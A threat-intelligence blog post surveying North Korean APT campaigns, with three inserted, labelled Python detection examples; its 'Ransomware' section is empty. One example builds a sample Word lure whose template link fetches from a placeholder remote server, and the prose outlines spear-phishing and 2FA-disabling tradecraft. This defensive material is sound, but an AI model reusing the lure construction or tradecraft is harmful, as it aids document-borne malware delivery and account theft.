The Lazarus Heist: Where Are They Now?
The BBC World Service has recently produced The Lazarus Heist podcast (available here), researched and presented by Geoff White and Jean H. Lee. This thrilling podcast dives into the intricacies of the elaborate Bangladesh Bank heist, an attempt to steal $1 billion. As a security researcher who actively tracks the Lazarus group and any mention of North Korean cyber activity, I found the series extremely detailed and well researched. There are many additional info gems that anyone who has researched North Korea will enjoy, and I also highly recommend it to any threat intelligence analyst investigating North Korean cyber activity.
The Lazarus Heist podcast also made me want to revisit what I have learned about North Korean advanced persistent threat (APT) groups. In February 2020, I blogged about who the Lazarus group is and what campaigns they are known for (see here). That was one of my first blogs, and I was eager to learn more while researching this infamous APT group. I thought, therefore, that I should write up what I now know about the Lazarus group and the Reconnaissance General Bureau (RGB) of the Democratic People's Republic of Korea (DPRK).
Hacking the World Financial System
Cryptocurrency
Cryptocurrency exchanges are a popular target for criminals. In terms of an actual heist, they represent a comparatively easier target than banks. Moreover, it is far easier for criminals to subsequently launder the funds and evade anti-fraud measures, which is often the key problem for any operation targeting financial organisations. In September 2020, Singapore-based cryptocurrency exchange KuCoin (kucoin.com) disclosed a major security breach that resulted in the theft of hundreds of millions of dollars in Bitcoin, Ether and ERC-20 tokens. Threat actors gained unauthorised access to the company's systems and began draining tokens from its hot wallets. Analysis of the blockchain transactions linked to the KuCoin heist uncovered ties to the Lazarus group, and the North Korean state-affiliated hackers reportedly stole over $275 million of cryptocurrency from the exchange. The attack was attributed to Lazarus because of the specific money laundering strategy the group has used in the past. Additionally, two deposit addresses to which Lazarus sent stolen funds in 2020 also received cryptocurrency stolen in the Harvest Finance heist, suggesting the group carried out that attack as well. [4, 5, 6]
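The attribution step described above, shared deposit addresses receiving funds from two separate heists, is a standard address-clustering heuristic. The following is an added example (not code from the original post or from any of the cited analysis firms) that applies that heuristic to a constructed toy ledger: the wallet names, amounts and hop structure are invented placeholders, not real on-chain data, and the hop limit is an assumed tuning parameter.

```python
"""Shared-deposit-address heuristic for linking two cryptocurrency heists.

Added example, not part of the original post. SAMPLE_TXS is constructed toy
data: addresses are placeholder labels, not real blockchain addresses.
"""
from collections import defaultdict

# Constructed sample ledger: (sender, receiver, amount) transfer edges.
# Wallets prefixed "heistA_" hold funds stolen in one incident and
# "heistB_" in another; "deposit_*" are exchange deposit addresses.
SAMPLE_TXS = [
    ("heistA_hot1", "mixer_1", 120.0),
    ("mixer_1", "deposit_X", 119.5),
    ("heistA_hot2", "deposit_Y", 40.0),
    ("heistB_vault", "relay_7", 300.0),
    ("relay_7", "deposit_X", 299.0),
    ("heistB_vault", "deposit_Z", 55.0),
    ("unrelated_user", "deposit_Y", 1.0),
]

# Which origin wallets belong to which incident (constructed labels).
HEISTS = {
    "heist_A": ["heistA_hot1", "heistA_hot2"],
    "heist_B": ["heistB_vault"],
}
DEPOSIT_ADDRESSES = {"deposit_X", "deposit_Y", "deposit_Z"}


def trace_forward(txs, start, max_hops=3):
    """Return every address reachable from `start` within `max_hops` transfers.

    max_hops is an assumed cut-off; real tracing also follows amounts and time.
    """
    out = defaultdict(set)
    for src, dst, _amount in txs:
        out[src].add(dst)
    seen, frontier = set(), {start}
    for _ in range(max_hops):
        nxt = set()
        for addr in frontier:
            nxt |= out[addr]
        nxt -= seen
        seen |= nxt
        frontier = nxt
    return seen


def shared_destinations(txs, heist_sources, deposit_addrs, max_hops=3):
    """Map deposit addresses to the set of heists whose funds reached them.

    heist_sources: {"label": [origin wallets]}. Only addresses reached by
    funds from two or more heists are returned; those are the linkage
    candidates an analyst would then examine by hand.
    """
    reached = defaultdict(set)
    for label, origins in heist_sources.items():
        for origin in origins:
            for addr in trace_forward(txs, origin, max_hops):
                if addr in deposit_addrs:
                    reached[addr].add(label)
    return {a: labels for a, labels in reached.items() if len(labels) > 1}


if __name__ == "__main__":
    for addr, labels in shared_destinations(SAMPLE_TXS, HEISTS, DEPOSIT_ADDRESSES).items():
        print(f"{addr} received funds from {sorted(labels)}")
```

On the constructed ledger only `deposit_X` is reached by both incidents, which is exactly the kind of overlap the analysis above relied on; a single shared address is a lead, not proof, since deposit addresses at a laundering service can also be shared by unrelated customers.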
North Korean hackers are among the most persistent threats targeting the cryptocurrency vertical globally. Security researchers track one North Korean cryptocurrency-focused group as CryptoCore, which targets cryptocurrency firms in Europe, the US, Israel, and Japan. CryptoCore has been linked to five attacks on cryptocurrency exchanges and has been operating since at least 2018. The first stage of an attack involves spear-phishing high-ranking individuals connected to the target organisation to establish a foothold. Once a user is compromised, CryptoCore targets the user's password manager to steal access keys for cryptocurrency wallets and account credentials. Once the keys are obtained, the operators log in and manually turn off two-factor authentication. Virtual funds are then immediately transferred to attacker-controlled wallets. [7, 8, 9, 10, 11]
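The CryptoCore sequence above (log in with stolen credentials, disable 2FA, withdraw at once) is tightly ordered, which makes it a good candidate for a correlation rule on exchange audit logs. The following is an added example, not code from the original post or from any exchange: it assumes a hypothetical key=value audit log format and a 30-minute correlation window, and the log lines are constructed (IPs are from documentation ranges, destinations are placeholders).

```python
"""Correlate '2FA disabled' with a withdrawal shortly afterwards.

Added example, not part of the original post. The log format below is an
assumed key=value format; SAMPLE_LOG is constructed, not a real audit log.
"""
from datetime import datetime, timedelta

# Constructed audit log. ops_admin has 2FA disabled then withdraws 82 seconds
# later; alice disables 2FA but withdraws two days later; bob never disables.
SAMPLE_LOG = """\
2020-09-25T21:02:11Z user=ops_admin event=login src=203.0.113.10
2020-09-25T21:03:40Z user=ops_admin event=2fa_disabled src=203.0.113.10
2020-09-25T21:05:02Z user=ops_admin event=withdrawal asset=BTC amount=150.0 dest=addr_new_1 src=203.0.113.10
2020-09-25T09:10:00Z user=alice event=2fa_disabled src=198.51.100.7
2020-09-27T10:00:00Z user=alice event=withdrawal asset=ETH amount=2.5 dest=addr_known_3 src=198.51.100.7
2020-09-25T12:00:00Z user=bob event=withdrawal asset=BTC amount=0.1 dest=addr_known_9 src=192.0.2.44
"""


def parse_line(line):
    """Parse 'TIMESTAMP key=value ...' into a dict with a datetime 'ts'."""
    ts_text, *fields = line.split()
    rec = {"ts": datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def detect_2fa_disable_then_withdraw(log_text, window=timedelta(minutes=30)):
    """Return one alert per withdrawal that follows a 2FA disable within `window`.

    Events are sorted by time first, so an unordered log is handled. Only the
    most recent disable per user is tracked; a later 2FA re-enable clears it.
    """
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                     key=lambda r: r["ts"])
    last_disable = {}   # user -> timestamp of most recent 2fa_disabled
    alerts = []
    for rec in events:
        user, event = rec.get("user"), rec.get("event")
        if event == "2fa_disabled":
            last_disable[user] = rec["ts"]
        elif event == "2fa_enabled":
            last_disable.pop(user, None)
        elif event == "withdrawal" and user in last_disable:
            gap = rec["ts"] - last_disable[user]
            if gap <= window:
                alerts.append({
                    "user": user,
                    "disabled_at": last_disable[user],
                    "withdrawn_at": rec["ts"],
                    "seconds_between": int(gap.total_seconds()),
                    "asset": rec.get("asset"),
                    "amount": float(rec.get("amount", 0)),
                    "dest": rec.get("dest"),
                    "src": rec.get("src"),
                })
    return alerts


if __name__ == "__main__":
    for a in detect_2fa_disable_then_withdraw(SAMPLE_LOG):
        print(f"ALERT {a['user']}: 2FA off {a['seconds_between']}s before "
              f"{a['amount']} {a['asset']} -> {a['dest']} from {a['src']}")
```

Run against the constructed log, only `ops_admin` fires. In production the same rule would be enriched with whether the destination address has been seen before for that account and whether the source IP matches the user's history, since both were anomalous in the incidents described above; the window is a tuning choice and a patient attacker can wait it out, so this should be one signal among several rather than the only control.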
In February 2021, CISA released a malware analysis report (MAR) on AppleJeus, a hidden backdoor concealed inside fake cryptocurrency trading applications. The Lazarus group used AppleJeus to target organisations in over 30 countries during 2020. The backdoored applications provided initial access to victims' networks, which was then used to steal cryptocurrency from their virtual wallets. The North Korean government has used multiple variants of AppleJeus; the earliest versions appeared in 2018. The initial infection vector varied across the campaign and included spear-phishing emails, malicious links sent via social media, and other social engineering techniques. [12]
Traditional Cybercrime
In 2019, the Lazarus group was connected to the Trickbot banking Trojan through the use of a framework called Anchor. The Anchor project combines a collection of tools designed for targeted data extraction from secure environments and long-term persistence. Trickbot and Anchor were reportedly developed by a Russian-speaking threat group known as Wizard Spider. The connection between Lazarus and Wizard Spider highlights that, much like common cybercriminals, these North Korean cyberspies work with the Russian criminal underground. The Trickbot banking Trojan is one of the most advanced cybercriminal tools in the current threat landscape. It is a modular backdoor with up to 30 plugins for different attacks, and it is able to perform so-called "web injects" for live credential harvesting, typically against bank accounts, to enable fraudulent wire transfers. The full extent of the partnership between the Trickbot operators and the Lazarus group is unknown, but for a financially motivated state-sponsored threat actor, Trickbot is one of the most capable tools available for such operations. [13, 14, 15]
Defence Industrial Base
State-sponsored APT groups regularly attempt to infiltrate aerospace and defence sector organisations. Throughout 2020 and the first half of 2021, North Korean APTs launched multiple campaigns targeting these sectors, dubbed Operation Interception, Operation Dream Job, and Operation North Star by private security firms. The attacks do not appear to be financially motivated. By infecting an employee's system at one of these organisations, the attackers would be able to steal highly sensitive intelligence on foreign military capabilities. Persistent access, provided by the group's custom malware, can enable the adversary to monitor communications and continually siphon intelligence from its targets. Further, by targeting employees who were looking to leave their current role, the attackers may have made some victims less likely to report a suspicious job offer to their current employer's security team, even after they realised they had been compromised. [18, 19, 20]
COVID-19
In June 2021, CISA, the FBI, and the UK NCSC issued a joint security advisory regarding DPRK cyber threat actors targeting a number of pharmaceutical, vaccine, and virology organisations affiliated with Operation Warp Speed (OWS). As a follow-up to the joint advisory, CISA and the FBI shared further details of an intrusion in October 2020: a confirmed Lazarus attack on a US-based pharmaceutical company working on a vaccine for SARS-CoV-2, the virus that causes COVID-19. Kaspersky researchers also disclosed that in September 2020 Lazarus operators targeted a pharmaceutical company and, in October, the APT group went after a government ministry involved in the COVID-19 response. [21, 22]
The Lazarus group also targeted individual staff members at Operation Warp Speed entities via social media sites, such as LinkedIn, as well as corporate and personal email accounts. Fictitious job opportunities were used to engage targets in conversations on private messaging apps; having built trust with the target, the threat actors sent job-themed malicious documents which attempt to connect to a malicious URL and download malware onto the victim's computer. After the initial compromise, the attackers work quickly to exfiltrate the targeted information; this can take as little as a few days.
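The job-themed documents described above connect out to a URL when opened. One common way a Word document is made to do that is an externally linked relationship (for example a remote attached template), and that link is visible in the document's OOXML package without opening it in Office. The following is an added example, not code from the original post or any vendor: it scans every `.rels` part of a .docx for `TargetMode="External"` relationships and flags the relationship types that fetch and execute content. The page does not say which mechanism these lures used, so the remote-template case is an assumption; the sample package is constructed inline, contains only the parts the scanner reads, and uses a documentation-range IP as the placeholder URL.

```python
"""Scan an OOXML (.docx) package for external relationships.

Added example, not part of the original post. build_sample_docx() produces a
constructed, minimal package (not a complete Word file) for the check; the
remote template URL is a placeholder using a documentation IP range.
"""
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted input prefer defusedxml
from urllib.parse import urlsplit

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types where an external target means Office will retrieve and
# load content automatically, rather than only on a user click.
HIGH_RISK_TYPES = {"attachedTemplate", "oleObject", "frame", "image"}
FETCH_SCHEMES = {"http", "https", "file", "ftp"}


def external_relationships(docx_bytes):
    """Return every externally targeted relationship in the package.

    Each finding records the .rels part, the short relationship type, the
    target, and whether the combination is one that auto-fetches remote code.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                scheme = urlsplit(target).scheme.lower()
                findings.append({
                    "part": name,
                    "type": rtype,
                    "target": target,
                    "high_risk": rtype in HIGH_RISK_TYPES and scheme in FETCH_SCHEMES,
                })
    return findings


def build_sample_docx(remote_template=None):
    """Constructed minimal package; only the parts the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("_rels/.rels",
                     f'<Relationships xmlns="{REL_NS[1:-1]}">'
                     f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" '
                     'Target="word/document.xml"/></Relationships>')
        pkg.writestr("word/document.xml", "<document/>")
        rels = [f'<Relationships xmlns="{REL_NS[1:-1]}">']
        if remote_template:
            # This is the shape of a remote template injection: the settings
            # part points at a template that lives on an attacker's server.
            rels.append(f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                        f'Target="{remote_template}" TargetMode="External"/>')
        rels.append("</Relationships>")
        pkg.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx("http://192.0.2.5/job_description.dotm")
    for f in external_relationships(lure):
        flag = "HIGH" if f["high_risk"] else "info"
        print(f"[{flag}] {f['part']}: {f['type']} -> {f['target']}")
```

A clean document returns an empty list; the constructed lure returns one high-risk `attachedTemplate` finding pointing at the placeholder server. This check is cheap enough to run on every attachment at the mail gateway, and it catches the document before any macro or payload analysis is needed, because the outbound fetch is declared in the package itself.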
In February 2021, a member of the South Korean parliament’s intelligence committee claimed that North Korean cyber spies targeted Pfizer to obtain COVID-19 vaccine technology. Pfizer stated it would not comment on the matter. In November 2020, Reuters shared an exclusive report detailing the attacks launched by North Korean cyber operatives against British drugmaker, AstraZeneca. [23, 24]
Nuclear Weapons
The DPRK RGB groups continuously launch intelligence gathering campaigns in support of North Korea's weapons of mass destruction (WMD) development programme. In June 2021, South Korean officials reported that North Korean hackers had breached the internal network of the Korea Atomic Energy Research Institute (KAERI), the South Korean government body that conducts research on nuclear power and nuclear fuel technology. The intrusion took place in May 2021 through a vulnerability in a virtual private network (VPN) server. The attack was attributed to Kimsuky, another APT group that reportedly belongs to the DPRK RGB. [25]
In May 2020, South Korean security firm ESTsecurity disclosed a new cyber-espionage campaign linked to Konni, another North Korean APT. The group was observed impersonating CISAC, an academic research centre dealing with nuclear issues, in its phishing lures. The researchers also noted that the payload used in this attack had been implanted into malicious documents impersonating the 'North Korea Central Committee Conference' and the '2020 Tokyo Paralympics'. [26]
Further, in September 2019, the US Treasury Department sanctioned three North Korean hacking groups (Lazarus, Andariel, Bluenoroff) for hacks aimed at stealing funds to funnel back into the country’s nuclear weapons and missile programs. [27]
Defectors
APT37 is thought to be a North Korean group that specialises in targeting defectors from the regime, particularly in South Korea. In November 2019, ESTsecurity identified suspected APT37 attacks using mobile malware against North Korean defectors living abroad. A malicious app was distributed from a website masquerading as a sponsored fundraising effort for North Korean defectors. Notably, the app was advertised as a "secure messaging app", dubbed Dragon Messenger. The fake website was built with WordPress and linked to the official Google Play Store listing for Dragon Messenger; the app communicates over Wi-Fi only, not through the SIM. Once installed, it attempts to read SMS messages on the victim's device, exfiltrate the contact list, and record calls. [29]
In March 2020, ESTsecurity uncovered a new APT37 campaign, dubbed Operation SpyCloud because of its use of Google Cloud services in spear-phishing attacks. Attribution to APT37 was based on the deployment of the ROKRAT malware family, primarily against targets in South Korea but also against Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. Many of the attacks targeted foreign affairs, unification, and security workers, heads of organisations related to North Korea, and North Korean defectors. [30, 31]
Ransomware
0days
0day vulnerabilities are among the most valuable assets for APT campaigns, and intelligence agencies treat them as cyber-weapons. In January 2021, Google's Threat Analysis Group (TAG) disclosed a new campaign targeting security researchers working on vulnerability research. TAG attributed this campaign to a government-backed entity based in North Korea. [38]
Indictments & Sanctions
In September 2018 and again in February 2021, the US Department of Justice indicted North Korean operatives for hacking campaigns. In March 2020, the US Treasury's Office of Foreign Assets Control (OFAC) sanctioned two Chinese nationals involved in laundering cryptocurrency stolen in several cyber intrusions carried out by the Lazarus group. [40, 41, 42]
Although the likelihood of the US ever arresting these individuals is incredibly low, these indictments aim to "refine the attribution of this crime spree to the DPRK military intelligence services, specifically the Reconnaissance General Bureau (RGB)". The regime has become a "criminal syndicate with a flag", according to the DOJ's announcement of the indictment, which states that North Korea "harnesses its state resources to steal hundreds of millions of dollars".
In March 2019, the United Nations (UN) DPRK Panel of Experts found that this illicit behaviour generates substantial revenue for North Korea. The country's regime can use these funds for its nuclear weapons and ballistic missile programs, prohibited by the UN. This activity also poses a significant operational risk to the financial services sector and erodes the integrity of the financial system. [43]
In July 2020, the US Army also published a report detailing tactics used by North Korea, including those used by the country's cyber threat actors. The report is used to train US troops and military leaders and covers the Korean People's Army (KPA), including its military tactics, weapons arsenal, leadership structure, troop types, logistics, and electronic warfare capabilities. [44]
Analysis
The Lazarus group continues to conduct well-planned, disciplined, and methodical cyber-operations more akin to espionage than standard cybercrime.
Additional Resources
- https://malpedia.caad.fkie.fraunhofer.de/actor/lazarus_group
- https://malpedia.caad.fkie.fraunhofer.de/actor/kimsuky
- https://malpedia.caad.fkie.fraunhofer.de/actor/silent_chollima
- https://malpedia.caad.fkie.fraunhofer.de/actor/apt37
- https://malpedia.caad.fkie.fraunhofer.de/details/win.konni
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
- https://github.com/BushidoUK/Open-source-tools-for-CTI/blob/master/Adversary%20Intelligence.md
- https://www.youtube.com/watch?v=9Vh2n6nC0t4
- https://www.youtube.com/watch?v=GR50MAuAc7Q
- https://www.youtube.com/watch?v=BJzOiai8Dv4&t=155s